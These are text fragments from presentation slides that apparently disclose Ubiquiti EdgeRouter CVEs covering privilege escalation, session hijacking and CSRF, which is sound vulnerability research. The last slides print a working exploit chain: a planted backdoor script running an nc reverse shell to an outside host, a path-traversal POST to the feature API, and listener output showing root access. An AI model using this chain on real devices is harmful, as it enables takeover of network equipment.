  • 36. CVE-2017-0935 – Privilege Escalation with Session Hijacking operator@ubnt:~$ df -h Filesystem Size Used Available Use% Mounted on ubi0_0 214.9M 144.4M 65.8M 69% /root.dev aufs 214.9M 144.4M 65.8M 69% / devtmpfs 124.4M 0 124.4M 0% /dev tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 60.0K 124.4M 0% /run tmpfs 124.5M 52.0K 124.4M 0% /var/log tmpfs 124.5M 0 124.5M 0% /tmp none 124.5M 112.0K 124.4M 0% /opt/vyatta/config unionfs 124.5M 0 124.5M 0% /opt/vyatta/config/tmp/new_config_g73ik18gms70ciap15in0mttpt0vk81b operator@ubnt:~$
  • 37. CVE-2017-0934 – Privilege Escalation with Session Hijacking total 0 drwxrwxrwt 4 root root 300 Jan 1 00:07 . drwxr-xr-x 31 root root 760 Jan 1 00:00 .. srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi drwxr-x--- 2 root root 40 Jan 1 00:00 ifp srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
  • 38. CVE-2017-0933 – CSRF Bypassing “Referer:” Whitelisting Protection $ ls -la fake_www/ total 16 drwxr-xr-x 2 hnrteam users 4096 jun 15 02:08 . drwxr-xr-x 7 hnrteam users 4096 jun 15 02:03 .. -rw-r--r-- 1 hnrteam users 3847 jun 15 02:05 index.html -rw-r--r-- 1 hnrteam users 232 jun 15 02:03 lighttpd.conf server.document-root = "/home/operator/fake_www" server.port = 3000 mimetype.assign = ( ".html" => "text/html", ) index-file.names = ( "index.html" ) The content of lighttpd.conf file:
  • 39. CVE-2017-0932 - Privilege Escalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}}
  • 40. CVE-2017-0932 - Privilege Escalation using API->Feature $ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash & POST /api/edge/feature.json HTTP/1.1 Host: 192.168.2.1 Referer: https://192.168.2.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 90 Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7 Connection: close {"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}} $ nc -lvp 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from 192.168.2.1 44440 received! id uid=0(root) gid=102(vyattacfg) uname -a Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux